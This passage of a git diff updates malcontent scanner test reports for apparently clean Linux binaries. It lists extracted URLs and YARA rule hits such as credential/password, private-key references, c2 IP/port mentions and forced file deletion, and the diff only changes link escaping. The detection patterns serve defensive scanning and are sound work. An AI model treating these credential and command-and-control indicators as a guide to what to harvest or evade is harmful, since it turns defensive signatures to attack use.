[https://crbug.com/dawn/402](https%3A%2F%2Fcrbug.com%2Fdawn%2F402)
[https://crbug.com/dawn/434](https%3A%2F%2Fcrbug.com%2Fdawn%2F434)
[https://crbug.com/dawn/480](https%3A%2F%2Fcrbug.com%2Fdawn%2F480)
[https://crbug.com/dawn/582](https%3A%2F%2Fcrbug.com%2Fdawn%2F582)
[https://crbug.com/dawn/633](https%3A%2F%2Fcrbug.com%2Fdawn%2F633)
[https://crbug.com/dawn/666](https%3A%2F%2Fcrbug.com%2Fdawn%2F666)
[https://crbug.com/dawn/667](https%3A%2F%2Fcrbug.com%2Fdawn%2F667)
[https://crbug.com/dawn/673](https%3A%2F%2Fcrbug.com%2Fdawn%2F673)
[https://crbug.com/dawn/776](https%3A%2F%2Fcrbug.com%2Fdawn%2F776)
[https://crbug.com/dawn/792](https%3A%2F%2Fcrbug.com%2Fdawn%2F792)
[https://crbug.com/dawn/838](https%3A%2F%2Fcrbug.com%2Fdawn%2F838)
[https://crbug.com/dawn/840](https%3A%2F%2Fcrbug.com%2Fdawn%2F840)
[https://crbug.com/dawn/960](https%3A%2F%2Fcrbug.com%2Fdawn%2F960)
[https://duckduckgo.com/ac/](https%3A%2F%2Fduckduckgo.com%2Fac%2F)
[https://en.softonic.com/s/](https%3A%2F%2Fen.softonic.com%2Fs%2F)
[https://go.mail.ru/msearch](https%3A%2F%2Fgo.mail.ru%2Fmsearch)
[https://m.so.com/index.php](https%3A%2F%2Fm.so.com%2Findex.php)
[https://nextdns.io/privacy](https%3A%2F%2Fnextdns.io%2Fprivacy)
[https://nl.softonic.com/s/](https%3A%2F%2Fnl.softonic.com%2Fs%2F)
[https://tobiassachs.report](https%3A%2F%2Ftobiassachs.report)
[https://yandex.com/search/](https%3A%2F%2Fyandex.com%2Fsearch%2F)
[http://en.softonic.com/s/](http%3A%2F%2Fen.softonic.com%2Fs%2F)
[http://nl.softonic.com/s/](http%3A%2F%2Fnl.softonic.com%2Fs%2F)
[http://ns.adobe.com/xfdf/](http%3A%2F%2Fns.adobe.com%2Fxfdf%2F)
[http://search.snapdo.com/](http%3A%2F%2Fsearch.snapdo.com%2F)
[http://unisolated.invalid](http%3A%2F%2Funisolated.invalid)
[http://www.interpretation](http%3A%2F%2Fwww.interpretation)
[https://chrome.cloudflare](https%3A%2F%2Fchrome.cloudflare)
[https://coccoc.com/search](https%3A%2F%2Fcoccoc.com%2Fsearch)
[https://crbug.com/1025266](https%3A%2F%2Fcrbug.com%2F1025266)
[https://crbug.com/1053756](https%3A%2F%2Fcrbug.com%2F1053756)
[https://crbug.com/1154140](https%3A%2F%2Fcrbug.com%2F1154140)
[https://crbug.com/1161355](https%3A%2F%2Fcrbug.com%2F1161355)
[https://crbug.com/1214923](https%3A%2F%2Fcrbug.com%2F1214923)
[https://crbug.com/1302249](https%3A%2F%2Fcrbug.com%2F1302249)
[https://crbug.com/1313172](https%3A%2F%2Fcrbug.com%2F1313172)
[https://crbug.com/619103.](https%3A%2F%2Fcrbug.com%2F619103.)
[https://crbug.com/638180.](https%3A%2F%2Fcrbug.com%2F638180.)
[https://crbug.com/dawn/36](https%3A%2F%2Fcrbug.com%2Fdawn%2F36)
[https://crbug.com/dawn/42](https%3A%2F%2Fcrbug.com%2Fdawn%2F42)
[https://crbug.com/dawn/56](https%3A%2F%2Fcrbug.com%2Fdawn%2F56)
[https://crbug.com/v8/7848](https%3A%2F%2Fcrbug.com%2Fv8%2F7848)
[https://crbug.com/v8/8520](https%3A%2F%2Fcrbug.com%2Fv8%2F8520)
[https://dns.quad9.net/dns](https%3A%2F%2Fdns.quad9.net%2Fdns)
[https://dns.switch.ch/dns](https%3A%2F%2Fdns.switch.ch%2Fdns)
[https://go.mail.ru/search](https%3A%2F%2Fgo.mail.ru%2Fsearch)
[https://scotthelme.report](https%3A%2F%2Fscotthelme.report)
[https://www.info.com/serp](https%3A%2F%2Fwww.info.com%2Fserp)
[https://www.sogou.com/web](https%3A%2F%2Fwww.sogou.com%2Fweb)
[https://www.w3.org/TR/mse](https%3A%2F%2Fwww.w3.org%2FTR%2Fmse)
[http://crbug.com/1138528](http%3A%2F%2Fcrbug.com%2F1138528)
[http://crbug.com/660005.](http%3A%2F%2Fcrbug.com%2F660005.)
[http://mathematicsmargin](http%3A%2F%2Fmathematicsmargin)
[http://ns.adobe.com/data](http%3A%2F%2Fns.adobe.com%2Fdata)
[http://radce.centrum.cz/](http%3A%2F%2Fradce.centrum.cz%2F)
[http://www.jclark.com/xt](http%3A%2F%2Fwww.jclark.com%2Fxt)
[http://www.w3.org/TR/REC](http%3A%2F%2Fwww.w3.org%2FTR%2FREC)
[https://crbug.com/401439](https%3A%2F%2Fcrbug.com%2F401439)
[https://crbug.com/824383](https%3A%2F%2Fcrbug.com%2F824383)
[https://crbug.com/824647](https%3A%2F%2Fcrbug.com%2F824647)
[https://crbug.com/927119](https%3A%2F%2Fcrbug.com%2F927119)
[https://crbug.com/981419](https%3A%2F%2Fcrbug.com%2F981419)
[https://docs.google.com/](https%3A%2F%2Fdocs.google.com%2F)
[https://googlevideo.com/](https%3A%2F%2Fgooglevideo.com%2F)
[https://m.sogou.com/web/](https%3A%2F%2Fm.sogou.com%2Fweb%2F)
[https://mths.be/punycode](https%3A%2F%2Fmths.be%2Fpunycode)
[https://ssl.gstatic.com/](https%3A%2F%2Fssl.gstatic.com%2F)
[https://tc39.es/ecma262/](https%3A%2F%2Ftc39.es%2Fecma262%2F)
[https://www.nic.cz/odvr/](https%3A%2F%2Fwww.nic.cz%2Fodvr%2F)
[https://www.w3.org/TR/hr](https%3A%2F%2Fwww.w3.org%2FTR%2Fhr)
[http://applicationslink](http%3A%2F%2Fapplicationslink)
[http://exslt.org/common](http%3A%2F%2Fexslt.org%2Fcommon)
[http://feed.snapdo.com/](http%3A%2F%2Ffeed.snapdo.com%2F)
[http://www.search.delta](http%3A%2F%2Fwww.search.delta)
[https://android.com/pay](https%3A%2F%2Fandroid.com%2Fpay)
[https://bit.ly/3rpDuEX.](https%3A%2F%2Fbit.ly%2F3rpDuEX.)
[https://crbug.com/tint.](https%3A%2F%2Fcrbug.com%2Ftint.)
[https://dns.sb/privacy/](https%3A%2F%2Fdns.sb%2Fprivacy%2F)
[https://doh.cox.net/dns](https%3A%2F%2Fdoh.cox.net%2Fdns)
[https://odvr.nic.cz/doh](https%3A%2F%2Fodvr.nic.cz%2Fdoh)
[https://server1.example](https%3A%2F%2Fserver1.example)
[https://server2.example](https%3A%2F%2Fserver2.example)
[https://www.ask.com/web](https%3A%2F%2Fwww.ask.com%2Fweb)
[https://www.baidu.com/s](https%3A%2F%2Fwww.baidu.com%2Fs)
[https://www.neti.ee/cgi](https%3A%2F%2Fwww.neti.ee%2Fcgi)
[http://html4/loose.dtd](http%3A%2F%2Fhtml4%2Floose.dtd)
[http://ok.hu/katalogus](http%3A%2F%2Fok.hu%2Fkatalogus)
[http://search.snap.do/](http%3A%2F%2Fsearch.snap.do%2F)
[http://staticsuggested](http%3A%2F%2Fstaticsuggested)
[http://www.example.com](http%3A%2F%2Fwww.example.com)
[http://www.neti.ee/cgi](http%3A%2F%2Fwww.neti.ee%2Fcgi)
[https://c.youtube.com/](https%3A%2F%2Fc.youtube.com%2F)
[https://dns.google/dns](https%3A%2F%2Fdns.google%2Fdns)
[https://doh.dns.sb/dns](https%3A%2F%2Fdoh.dns.sb%2Fdns)
[https://google.com/pay](https%3A%2F%2Fgoogle.com%2Fpay)
[https://history.report](https%3A%2F%2Fhistory.report)
[https://v8.dev/blog/v8](https%3A%2F%2Fv8.dev%2Fblog%2Fv8)
[https://webrtc.org/web](https%3A%2F%2Fwebrtc.org%2Fweb)
[http://iparticipation](http%3A%2F%2Fiparticipation)
[https://crbug.com/new](https%3A%2F%2Fcrbug.com%2Fnew)
[https://gcp.gvt2.com/](https%3A%2F%2Fgcp.gvt2.com%2F)
[https://gcp.gvt6.com/](https%3A%2F%2Fgcp.gvt6.com%2F)
[https://github.com/da](https%3A%2F%2Fgithub.com%2Fda)
[https://goo.gl/4NeimX](https%3A%2F%2Fgoo.gl%2F4NeimX)
[https://goo.gl/7K7WLu](https%3A%2F%2Fgoo.gl%2F7K7WLu)
[https://goo.gl/EuHzyv](https%3A%2F%2Fgoo.gl%2FEuHzyv)
[https://goo.gl/HxfxSQ](https%3A%2F%2Fgoo.gl%2FHxfxSQ)
[https://goo.gl/J6ASzs](https%3A%2F%2Fgoo.gl%2FJ6ASzs)
[https://goo.gl/LdLk22](https%3A%2F%2Fgoo.gl%2FLdLk22)
[https://goo.gl/Y0ZkNV](https%3A%2F%2Fgoo.gl%2FY0ZkNV)
[https://goo.gl/rStTGz](https%3A%2F%2Fgoo.gl%2FrStTGz)
[https://goo.gl/t5IS6M](https%3A%2F%2Fgoo.gl%2Ft5IS6M)
[https://goo.gl/xX8pDD](https%3A%2F%2Fgoo.gl%2FxX8pDD)
[https://goo.gl/ximf56](https%3A%2F%2Fgoo.gl%2Fximf56)
[https://goo.gl/yabPex](https%3A%2F%2Fgoo.gl%2FyabPex)
[http://feed.snap.do/](http%3A%2F%2Ffeed.snap.do%2F)
[http://icl.com/saxon](http%3A%2F%2Ficl.com%2Fsaxon)
[http://narwhaljs.org](http%3A%2F%2Fnarwhaljs.org)
[http://userguide.icu](http%3A%2F%2Fuserguide.icu)
[http://wpad/wpad.dat](http%3A%2F%2Fwpad%2Fwpad.dat)
[http://www.color.org](http%3A%2F%2Fwww.color.org)
[http://www.language=](http%3A%2F%2Fwww.language%3D)
[http://www.yhs.delta](http%3A%2F%2Fwww.yhs.delta)
[https://bit.ly/audio](https%3A%2F%2Fbit.ly%2Faudio)
[https://www.so.com/s](https%3A%2F%2Fwww.so.com%2Fs)
[http://mixidj.delta](http%3A%2F%2Fmixidj.delta)
[http://www.midnight](http%3A%2F%2Fwww.midnight)
[https://example.org](https%3A%2F%2Fexample.org)
[http://interpreted](http%3A%2F%2Finterpreted)
[http://www.hortcut](http%3A%2F%2Fwww.hortcut)
[http://www2.public](http%3A%2F%2Fwww2.public)
[https://m.so.com/s](https%3A%2F%2Fm.so.com%2Fs)
[https://wiki.squid](https%3A%2F%2Fwiki.squid)
[https://www.recent](https%3A%2F%2Fwww.recent)
[http://dts.search](http%3A%2F%2Fdts.search)
[http://feross.org](http%3A%2F%2Ffeross.org)
[http://interested](http%3A%2F%2Finterested)
[http://navigation](http%3A%2F%2Fnavigation)
[http://www.C//DTD](http%3A%2F%2Fwww.C%2F%2FDTD)
[http://www.iec.ch](http%3A%2F%2Fwww.iec.ch)
[http://www.style=](http%3A%2F%2Fwww.style%3D)
[http://www1.delta](http%3A%2F%2Fwww1.delta)
[http://www2.delta](http%3A%2F%2Fwww2.delta)
[https://gvt1.com/](https%3A%2F%2Fgvt1.com%2F)
[https://gvt2.com/](https%3A%2F%2Fgvt2.com%2F)
[https://gvt6.com/](https%3A%2F%2Fgvt6.com%2F)
[https://invisible](https%3A%2F%2Finvisible)
[https://www.World](https%3A%2F%2Fwww.World)
[http://127.0.0.1](http%3A%2F%2F127.0.0.1)
[http://according](http%3A%2F%2Faccording)
[http://encoding=](http%3A%2F%2Fencoding%3D)
[http://imEnglish](http%3A%2F%2FimEnglish)
[http://localhost](http%3A%2F%2Flocalhost)
[http://site_name](http%3A%2F%2Fsite_name)
[http://www.delta](http%3A%2F%2Fwww.delta)
[http://www.squid](http%3A%2F%2Fwww.squid)
[http://www.years](http%3A%2F%2Fwww.years)
[https://www.ecma](https%3A%2F%2Fwww.ecma)
[http://familiar](http%3A%2F%2Ffamiliar)
[http://www./div](http%3A%2F%2Fwww.%2Fdiv)
[http://www.icon](http%3A%2F%2Fwww.icon)
[http://www.text](http%3A%2F%2Fwww.text) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https%3A%2F%2F)
[http://](http%3A%2F%2F)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | | LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[have-a-username-password-port](https://github.com/search?q=have-a-username-password-port&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[have-username-password-port](https://github.com/search?q=have-username-password-port&type=code)
[keyring_store_password_sync](https://github.com/search?q=keyring_store_password_sync&type=code)
[keyring_find_password_sync](https://github.com/search?q=keyring_find_password_sync&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[and password fields set](https://github.com/search?q=and+password+fields+set&type=code)
[keyring_delete_password](https://github.com/search?q=keyring_delete_password&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[keyring_free_password](https://github.com/search?q=keyring_free_password&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[gaia_password_reuse](https://github.com/search?q=gaia_password_reuse&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
[password-protection](https://github.com/search?q=password-protection&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[const has_password](https://github.com/search?q=const+has_password&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[password_specifics](https://github.com/search?q=password_specifics&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code) | | LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | @@ -105,7 +105,7 @@ | LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | | LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public Key](https://github.com/search?q=Public+Key&type=code)
[Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require\('tls'\)](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | @@ -132,7 +132,7 @@ | LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | | LOW | [fs/file/append](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-append.yara#append_file) | appends to a file | [appendFile](https://github.com/search?q=appendFile&type=code) | | LOW | [fs/file/delete_forcibly](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete-forcibly.yara#rm_force) | Forcibly deletes files | [rm HP-USB500 5.1 Headset](https://github.com/search?q=rm+HP-USB500+5.1+Headset&type=code)
[rm PA-WL54GU](https://github.com/search?q=rm+PA-WL54GU&type=code) | -| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open(](https://github.com/search?q=open%28&type=code) | +| LOW | [fs/file/open](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-open.yara#py_open) | opens files | [open\(](https://github.com/search?q=open%28&type=code) | | LOW | [fs/file/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-read.yara#go_file_read) | reads files | [ReadFile](https://github.com/search?q=ReadFile&type=code) | | LOW | [fs/file/rename](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-rename.yara#explicit_rename) | renames files | [MoveFile](https://github.com/search?q=MoveFile&type=code) | | LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | @@ -155,7 +155,7 @@ | LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | | LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) | | LOW | [impact/ui/screen_capture](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/screen-capture.yara#macos_screen_capture) | macos screen capture | [captureScreen](https://github.com/search?q=captureScreen&type=code) | -| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) | +| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require\('dns'\)](https://github.com/search?q=require%28%27dns%27%29&type=code) | | LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) | | LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | | LOW | [net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http) | Uses the HTTP protocol | [HTTP](https://github.com/search?q=HTTP&type=code)
[http](https://github.com/search?q=http&type=code) | @@ -176,9 +176,9 @@ | LOW | [net/url/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/parse.yara#url_handle) | Handles URL strings | [URLContext](https://github.com/search?q=URLContext&type=code)
[new URL](https://github.com/search?q=new+URL&type=code) | | LOW | [os/env/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/env/get.yara#getenv) | Retrieve environment variable values | [getenv](https://github.com/search?q=getenv&type=code) | | LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read()](https://github.com/search?q=context.read%28%29&type=code)
[reader.read()](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read()](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read()](https://github.com/search?q=stream.read%28%29&type=code)
[self.read()](https://github.com/search?q=self.read%28%29&type=code)
[tail.read()](https://github.com/search?q=tail.read%28%29&type=code)
[req.read()](https://github.com/search?q=req.read%28%29&type=code) | +| LOW | [os/fd/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/read.yara#py_fd_read) | reads from a file handle | [context.read\(\)](https://github.com/search?q=context.read%28%29&type=code)
[reader.read\(\)](https://github.com/search?q=reader.read%28%29&type=code)
[socket.read\(\)](https://github.com/search?q=socket.read%28%29&type=code)
[stream.read\(\)](https://github.com/search?q=stream.read%28%29&type=code)
[self.read\(\)](https://github.com/search?q=self.read%28%29&type=code)
[tail.read\(\)](https://github.com/search?q=tail.read%28%29&type=code)
[req.read\(\)](https://github.com/search?q=req.read%28%29&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | -| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [output.write(stringToWrite)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write(chunk)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[output.write(errStack)](https://github.com/search?q=output.write%28errStack%29&type=code)
[writable.write(chunk)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write(e)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[decoder.write(chunk)](https://github.com/search?q=decoder.write%28chunk%29&type=code)
[output.write(result)](https://github.com/search?q=output.write%28result%29&type=code)
[stream.write(string)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write(response)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write(ret)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write(data)](https://github.com/search?q=decoder.write%28data%29&type=code)
[writer.write(chunk)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write(line)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write(prefix)](https://github.com/search?q=self.write%28prefix%29&type=code)
[stream.write(data)](https://github.com/search?q=stream.write%28data%29&type=code)
[_decoder.write(b)](https://github.com/search?q=_decoder.write%28b%29&type=code)
[dest.write(chunk)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write(data)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write(s)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write(buf)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write(val)](https://github.com/search?q=pt.write%28val%29&type=code) | +| LOW | [os/fd/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/write.yara#py_fd_write) | writes to a file handle | [output.write\(stringToWrite\)](https://github.com/search?q=output.write%28stringToWrite%29&type=code)
[streamWritable.write\(chunk\)](https://github.com/search?q=streamWritable.write%28chunk%29&type=code)
[output.write\(errStack\)](https://github.com/search?q=output.write%28errStack%29&type=code)
[writable.write\(chunk\)](https://github.com/search?q=writable.write%28chunk%29&type=code)
[_downstream.write\(e\)](https://github.com/search?q=_downstream.write%28e%29&type=code)
[decoder.write\(chunk\)](https://github.com/search?q=decoder.write%28chunk%29&type=code)
[output.write\(result\)](https://github.com/search?q=output.write%28result%29&type=code)
[stream.write\(string\)](https://github.com/search?q=stream.write%28string%29&type=code)
[this.write\(response\)](https://github.com/search?q=this.write%28response%29&type=code)
[_decoder.write\(ret\)](https://github.com/search?q=_decoder.write%28ret%29&type=code)
[decoder.write\(data\)](https://github.com/search?q=decoder.write%28data%29&type=code)
[writer.write\(chunk\)](https://github.com/search?q=writer.write%28chunk%29&type=code)
[output.write\(line\)](https://github.com/search?q=output.write%28line%29&type=code)
[self.write\(prefix\)](https://github.com/search?q=self.write%28prefix%29&type=code)
[stream.write\(data\)](https://github.com/search?q=stream.write%28data%29&type=code)
[_decoder.write\(b\)](https://github.com/search?q=_decoder.write%28b%29&type=code)
[dest.write\(chunk\)](https://github.com/search?q=dest.write%28chunk%29&type=code)
[this.write\(data\)](https://github.com/search?q=this.write%28data%29&type=code)
[stdout.write\(s\)](https://github.com/search?q=stdout.write%28s%29&type=code)
[this.write\(buf\)](https://github.com/search?q=this.write%28buf%29&type=code)
[pt.write\(val\)](https://github.com/search?q=pt.write%28val%29&type=code) | | LOW | [os/kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | | LOW | [os/kernel/perfmon](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/perfmon.yara#perf_event_open) | set up performance monitoring | [perf_event_open](https://github.com/search?q=perf_event_open&type=code) | | LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md index 16a62162e..8051c48d6 100644 --- a/tests/linux/clean/cpack.md +++ b/tests/linux/clean/cpack.md @@ -5,7 +5,7 @@ | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code)
[Port](https://github.com/search?q=Port&type=code)
[IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) | -| MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
